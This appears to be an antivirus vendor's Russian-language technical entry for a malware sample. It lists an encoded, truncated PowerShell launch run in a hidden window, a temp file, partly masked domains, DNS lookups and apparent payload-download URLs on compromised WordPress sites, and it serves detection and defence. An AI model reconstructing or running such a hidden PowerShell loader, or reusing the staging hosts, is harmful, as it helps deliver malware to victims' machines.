Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AG8AYQByAGMAYQBlAHkAZgB1AHUAbgA9ACcAZgBvAGUAYwBxAHUAaQBzACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAVQBSAEkAdABgAFkAUABgAFIAbwB0AE8AQwBgAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1984
- %TEMP%\1230052.cvr
- 'ph#####ninjarank.com':443
- 'mp###rat.com':80
- 'tr####onlines.com':80
- 'tr####onlines.com':443
- 'pk#.goog':80
- 'th####eartist.com':80
- 'pe###ilm.com':80
- 'hu###omains.com':443
- http://www.mp###rat.com/cgi-bin/ncua/
- http://tr####onlines.com/Trends/wp-content/plugins/wp-file-manager/classes/kXWQG5T/
- http://www.th####eartist.com/images/jda/
- http://www.pe###ilm.com/wp-admin/j4i/
- 'ph#####ninjarank.com':443
- 'tr####onlines.com':443
- 'hu###omains.com':443
- DNS ASK ph#####ninjarank.com
- DNS ASK mp###rat.com
- DNS ASK tr####onlines.com
- DNS ASK pk#.goog
- DNS ASK th####eartist.com
- DNS ASK pe###ilm.com
- DNS ASK hu###omains.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AG8AYQByAGMAYQBlAHkAZgB1AHUAbgA9ACcAZgBvAGUAYwBxAHUAaQBzACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAVQBSAEkAdABgAFkAUABgAFIAbwB0AE8AQwBgAG...' (со скрытым окном)